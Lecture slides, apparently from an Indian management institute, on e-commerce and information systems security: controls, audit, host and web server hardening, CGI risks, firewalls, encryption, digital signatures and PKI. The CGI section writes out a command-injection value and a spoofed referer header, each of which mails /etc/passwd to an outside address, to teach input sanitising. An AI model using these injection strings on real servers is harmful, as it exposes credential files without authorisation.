Information Systems – Security Issues• Electronic Commerce - Security

ArmyinKashmir site hijacked by ISI

Anti-Nuke Hackers break into BARC computers

National Informatics Center -- a treasure trove of Govt. India Information, site compromised

• All these stories have been on the front pages of major newspapers.

• If Internet is so insecure, How can we put our corporate information on Internet?

• For Commerce to thrive on Internet, both Clients and Vendors trust is required.

• In real-life commerce both parties can be sure of each other’s identities, the web is made of anonymous, unknown, geographically distributed people.

• Unfortunately, causes of failure are -- lack of awareness, lax application, and misconceptions

Prof. Bharat Bhasker, Indian Institute of Management Lucknow

THREATS TO INFORMATION SYSTEMS

• HARDWARE FAILURE, SOFTWARE FAILURE, ELECTRICAL PROBLEMS

• COMMUNICATIONS PROBLEMS• PERSONNEL AND ORGANISATIONAL

ACTIONS – SECURITY BREACHES

• ACCESS PENETRATION, PROGRAM CHANGES• THEFT OF DATA, SERVICES, EQUIPMENT

– USER ERRORS

• FIRE AND OTHER NATURAL DISASTER

Causes of Threats

• USER: Identification, Authentication, Subtle Software Modification

• PROGRAMMER: Disables Protective Features; Reveals Protective Measures

• MAINTENANCE STAFF: Disables Hardware Devices; Uses Stand-alone Utilities

• OPERATOR: Doesn’t Notify Supervisor, Reveals Protective Measures

SYSTEM QUALITY PROBLEMS

• SOFTWARE & DATA• BUGS: Program Code Defects or Errors• MAINTENANCE: Modifying a System in

Production Use; Can take up to 85% of Analysts’ Time

• DATA QUALITY PROBLEMS: Finding, Correcting Errors; Costly; Tedious– FBI found 54.1% of the records to be

inaccurate

DISASTER• LOSS OF HARDWARE, SOFTWARE, DATA

BY FIRE, POWER FAILURE, FLOOD OR OTHER CALAMITY– Disaster recovery provided by back-up

facilities for Mastercard, Visa, almost all banks and financial institutions

• FAULT-TOLERANT COMPUTER SYSTEMS: BACKUP SYSTEMS TO PREVENT SYSTEM FAILURE (Particularly On-line Transaction Processing)– duplication of hardware and software

CREATING A CONTROL ENVIRONMENT

• CONTROLS: Methods, Policies, Procedures to Protect Assets; Accuracy & Reliability of Records; Adherence to Management Standards– GENERAL– APPLICATION

GENERAL CONTROLS

• SOFTWARE• HARDWARE• COMPUTER OPERATIONS• DATA SECURITY• ADMINISTRATIVE: Ensure Controls Properly

Executed, Enforced• IMPLEMENTATION: Audit System Development

to Assure Proper Control, Management

APPLICATION CONTROLS

• INPUT• PROCESSING• OUTPUT

INPUT CONTROLS

• INPUT AUTHORIZATION: Record, Monitor Source Documents

• DATA CONVERSION: Transcribe Data Properly from one Form to Another

• BATCH CONTROL TOTALS: Count Transactions Prior to and After Processing

• EDIT CHECKS: Verify Input Data, Correct Errors

PROCESSING CONTROLS

• ESTABLISH THAT DATA IS COMPLETE, ACCURATE DURING PROCESSING

• RUN CONTROL TOTALS: Generate Control Totals Before & After Processing

• COMPUTER MATCHING: Match Input Data to Master Files

OUTPUT CONTROLS

• ESTABLISH THAT RESULTS ARE ACCURATE, COMPLETE, PROPERLY DISTRIBUTED

• BALANCE INPUT, PROCESSING, OUTPUT TOTALS

• REVIEW PROCESSING LOGS• ENSURE ONLY AUTHORIZED

RECIPIENTS GET RESULTS

DEVELOPING A CONTROL STRUCTURE• COSTS: Can be Expensive to Build;

Complicated to Use• BENEFITS: Reduces Expensive Errors,

Loss of Time, Resources, Good Will• RISK ASSESSMENT: Determine

Frequency of Occurrence of Problem, Cost, Damage if it Were to Occur

MIS AUDIT

• IDENTIFIES CONTROLS OF INFORMATION SYSTEMS, ASSESSES THEIR EFFECTIVENESS

• TRACE FLOW OF SAMPLE TRANSACTIONS; NOTE HOW CONTROLS WORK

• LIST, RANK WEAKNESSES• ESTIMATE PROBABILITIES, IMPACT• REPORT TO MANAGEMENT

Transaction Security

• Electronic Commerce - Security• Securing the Internet Commerce is akin to Securing

your business secrets and activities in real life

• Security Concern have to be addressed at three levels

– Security of the Host ( Where the business is hosted)– Security of the Server providing the service (

HTTP/Web Server)– Communication Environment

• Network Environment• Transaction Security

Prof. Bharat Bhasker, Indian Institute of Management Lucknow -

Electronic Commerce - Host Security• Site Security Handbook - RFC 1244 details-- How to secure a

Host computer from break-in• Seven Critical Principles--

– Parsimony ( Simplest possible) • Remove services that are not required

(HTTP,SMTP,POP3,IMAP...)• Remove all things from host that are not required

– Compilers, NFS Daemons, Interpreters, Shells– Superuser (Root) privileges– Access Control ( Authentication, privilege system)– Accountability (Securely log actions for Ids)– Audit & Auditability ( Any change anywhere is the systems)

• COPS, TAMU, TripWire– Notification ( CERT, CIAC, Alarm Systems)– Recovery ( It may happen, How to cope on morning-after?)

Electronic Commerce - Web Server Security

• Each HTTP Server has 4 configuration files– Access.conf Access Control– httpd.conf Server Configuration– mime.types File extension and meanings– srm.conf Options including directories and Users.

• Define in httpd.conf ServerRoot /var/httpd/• Define in srm.conf /var/httpdocs

Root

Serverroot

Documentroot

Electronic Commerce - Web Server Security• AUTHENTICATION BASED Service

• define in Access.conf – AuthUserFile /var/httpd/user ==> file is shorter version

on /etc/passwd» Content --- groucho:Ygk871woj

– AuthGroupFile /var/httpd/group» TeamA: mjr rubi groucho

– AccessFileName .accessfile (generally .htaccess)» Per directory controls one can ven download

the .accessfile– Allow and deny certain Host names (Wildcards), IP

Addresses– Host Names are susceptible to DNS spoofing– Server Side Includes => Allowing Execs will have security

issues similar to CGI. Any passed string parameters can be exploited.

Electronic Commerce - CGI Security

• Three ways to break into a Web Server– Host Security fails; Some other service failure that runs

on same server– Hyper Text Transfer Protocol-- Clever messages to exploit

bugs, e.g., opening ../..? In Microsoft IIS crashed the server. (Denial of Service attack)

– Exploiting the weakness in CGI programs• A Closer look at the CGI Program - Variable set and Stdin

– SERVER_SOFTWARE – SERVER_PROTOCOL – SERVER_PORT – REQUEST_METHOD – PATH_INFO – QUERY_STRING – REMOTE_HOST – REMOTE_ADDR – CONTENT_TYPE – HTTP_ACCEPT – HTTP_REFERER

Electronic Commerce - CGI Security

• Many of these variables can be spoofed, CGI program has to be careful. The data of GET method comes in QUERY_STRING user can pass anything in the form fields. Same is the case with PUT, except that the data is read from stdin.

• A simple CGI to search for a string in a file can be written as – system(“/usr/bin/grep $string /usr/local/database/file)– What if user passes

• alpha beta; /bin/mail jjack@buddy.com </etc/passwd; more commands;

• ANY CGI, SSI will suffer from this drawback.– If (HTTP_REFERER) { Give credit to the site}– User passes HTTP_REFERER as /bin/mail

jack@buddy.com</etc/passwd• Sanitize anything you get from CGI User

– $CLEAN_INPUT= `unescape $DIRTY_INPUT’– Restrict access to CGI, place it all in one directory (you can scan

it for errs)– use SafeCGI like utilities

Electronic Commerce - Secure the Fort (Firewalls)• Digging a deep moat around your palace• Design forced everyone to entering or leaving the palace

to pass through a single drawbridge.

• Companies can have several LANs, but the connection to outside world is restricted through a limited doorways, called Firewalls

• Firewalls have two components – Two routers – Application gateways

• The route to outside world exist through this passageway.

• First router is used for incoming packet filtering • The second internal router for outgoing packet filtering

along with application gateway acts as additional screening for limited offered services

Electronic Commerce - Secure the Fort (Firewalls)

Electronic Commerce - Secure the Fort (Firewalls)

Electronic Commerce - Transaction Security• E-commerce transaction security problems are of four types

– Secrecy– Authentication

• Ability to identify whom are you talking to, before revealing business secrets are entering in a business deal

– non-repudiation• How do you prove that the electronic order was placed

for 500 cards at Rs5.00 each, when later on party denies placing it or at a lower price. It deals with those “signed deals”.

• How can you be sure before scheduling production of a custom order, that it was not a trick by a malicious adversary.

– integrity control• In real life we deal with these issues too. Secrecy and integrity

using registered mails, locking the documents up• Original documents address the non-repudiation &

Authentication is addressed by recognizing faces,voices, signs etc.

Symmetric Encryption Example

Dear Bob:

How about comingover to my placeat 1:30? If Tedever finds out weare meeting likethis it could bedisastrous.

Love, Alice

Dear Bob:

How about comingover to my placeat 1:30? If Ted ever finds out we are meeting like this it could bedisastrous.

Love, Alice

Alice Bob

decryptencrypt011100111001001110011100111001001110000111111

ciphertext

Symmetric Encryption Issues

• Key (shared secret) vulnerable to discovery

• Need to share a unique secret key with each party that you wish to securely communicate– Key management becomes

unmanageable

Asymmetric Encryption

• Two mathematically related keys– Unable to derive one from the other – Encrypt with one – decrypt with other

• Public Key Cryptography– One (public) key published for all to see– Other (private) key kept secret

• Algorithms– RSA - Integer Factorization (large primes)– Diffie-Hellman - Discrete Logarithms– ECES - Elliptic Curve Discrete Logarithm

Asymmetric Encryption Example

Dear Carol:

I think Alice ishaving an affairwith Bob. I need to see youright away.

Love, Ted

Dear Carol:

I think Alice ishaving an affairwith Bob. I need to see youright away.

Love, Ted

Ted Carol

encrypt decrypt

Carol'sPrivate Key

Carol'sPublic Key

011100111001001110011100111001001110000111111

ciphertext

Asymmetric Advantages

• No shared secret key• Public key is public

– Can be freely distributed or published– Key management is much easier

• Private key known ONLY to owner– Less vulnerable, easier to keep secret

• Supports Non-repudiation– Sender can not deny sending message

Electronic Commerce - Integrity

Message Digest - Public Key System

• If secrecy of document is not the issue, A sends P, Da(MD(P)).

• Trudy intercepts and modifies P to P’, B use Eb(MD(P)) to get to MD(P), Computes MD(P’) two values won’t match.

AliceAlice BankBankP,Da(MD(P))

Prof. Bharat Bhasker, Indian Institute of Management Lucknow -

Asymmetric Non-Repudiation

Dear Ted:

Please leave mealone or I willcontact a lawyer.I do not care aboutyour personal life.

Carol

Ted Carol

decrypt

Carol'sPublic Key

Dear Ted:

Please leave mealone or I willcontact a lawyer.I do not care aboutyour personal life.

Carol

Carol'sPrivate Key

encrypt011100111001001110011100111001001110000111111

ciphertext

Non-repudiation

• Since only the sender knows their private key, only the sender could have sent the message.

• Authentication mechanism• Basis for Digital Signature

Asymmetric Issues

• More computationally intensive– 100x symmetric encryption

• Generally not used to encrypt data– Encrypt symmetric key (S/MIME)– SSL session key

S/MIME Encryption

Dear Carol:

Please do notpush me away.I love you morethan I do Alice.

Love, Ted

encrypt

Carol'sPublic Key

encrypt011100111011001110010011100001

A032F17634E57BC43356743212b9c98FA29173425633A22201807732ECF13344567520ABCE4567CD

decrypt

Carol'sPrivate Key

decrypt

Dear Carol:

Please do notpush me away.I love you morethan I do Alice.

Love, Ted

Digital Signature

• Type of Electronic Signature• Combines one-way secure hash functions

with public key cryptography– Hash function generates fixed length value– No two documents produce the same hash value– Secure Hash Algorithm 1 (SHA-1)

• Characteristics– Data Integrity - hash value– Non-repudiation – encrypted with private key– Does NOT provide confidentiality

Digital Signature Creation

Dear Mr. Ted:

We have asked theCourt to issue a restraining order against you to stayaway from Carol.

Sincerely,

Sue YewDewey, Cheatam & Howe, Law Firm

Dear Mr. Ted:

We have asked theCourt to issue a restraining order against you to stayaway from Carol.

Sincerely,

Sue YewDewey, Cheatam & Howe, Law Firm

encrypt

Sue'sPrivate Key

HashFunction

Sue

0F47CEFFAE0317DBAA567C29

HashValue

01010111100001101011011110101111010111

DigitalSignature

Digital Signature Validation

Dear Mr. Ted:

We have asked theCourt to issue a restraining order against you to stay away from Carol.

Sincerely,

Sue YewDewey, Cheatam & Howe, Law Firm

01010111100001101011011110101111010111

Sue'sPublic Key

decrypt 0F47CEFFAE0317DBAA567C29

0F47CEFFAE0317DBAA567C29 Signature is valid

if the two hashesmatch

Source of Public Key

• Keys can be published anywhere• Attached as a signature to e-mail

– Pretty Good Privacy (PGP)

-----BEGIN PGP SIGNATURE-----Version: PGP 7.0.4

iQCVAwUBOx6SgoFNSxzKNZKFAQGK+gP6AnCVghZqbL3+rM5JMSqoC5OEYIkbvYZN92CL+YSCj/EkdZnjxFmU9+wGsWiCwxvs/TzSX6SZxlpG1bHFKf0OPu7+JEfJ7J5zcPCSqbFXiXzmukMl5KNx0p0veIDW4DmwleDpkmhT05qnCheweoNyvTSzfA1TGeLlmpjBi6zUjiY==Xq10-----END PGP SIGNATURE-----

But

• How do you know for sure who is the owner of a public key?

Public Key Infrastructure

Public Key Infrastructure (PKI) provides themeans to bind public keys to their owners and helps in the distribution of reliable public keys in large heterogeneous networks. NIST

The set of hardware, software, people, policies and procedures needed to create, manage, store, distribute, and revoke Public Key Certificates based on public-key cryptography. IETF PKIX working group

Public Key Certificates

• Digital Certificates– Binds a public key to it's owner– Issued and digitally signed by a

trusted third party– Like an electronic photo-id

• Follows X509 V3 standard – RFC 2459

X509 V3 Basic Fields

• Owner's X.500 distinguished name (DN)– C=IN;O=GOV,OU=IIML;CN=Bharat Bhasker

• Owner's public key • Validity period• Issuer's X.500 distinguished name

X509 V3 Extensions

• Location of certificate status information• Location of Issuer's certificate• Subject's Alternative Name

– email address, employee ID

• Key Usage constraints– Only for digital signatures– Only for encryption

• Policy information – Level of trust

X.509 V3 Certificate

Version 2 (V1=0, V2=1, V3=2)

Serial Number 56

Signature Algorithm sh1RSA

Issuer DN C=IN;S=UP;O=MIT;OU=MIT CA;CN=RootCA

Validity Period 05/02/2000 08:00:00 to 05/02/2001 08:00:00

Subject DN C=IN;O=GOV;O=IIM;OU=IIML;CN=Bharat Bhasker

Subject Public Key RSA, 3081 8902 8181 … 0001

Issuer UID Usually omitted

Subject UID Usually omitted

Extensions Optional Extensions

Signature Algorithm sh1RSA (same as above)

Signature 302C 0258 AE18 7CF2 … 8D48

How a PKI Issues Certificates

Subscriber RACredentials

PasscodePublic Key

Certificate containing KeySigned by CA

Repository

Passcode

CA

Subscriber'sCredentialsPasscode

Who do you Trust?

• Everyone trusts their CA – Trust all certificates issued by their CA

CA

George Martha Clark

Single CA model does not scale well Difficult to manage across large or diverse

user communities

Certification Path

Root CARoot CA

Certificate Info

Root Signature

Sub CARoot Signature

Subordinate CACertificate Info

Root CA's Private Key

Root CA's Private Key

Subordinate CA's Private Key

SubCA's Signature

SubscriberCertificate Info

Subscriber's Signature

TextDocument Subscriber's Private Key

Self Signed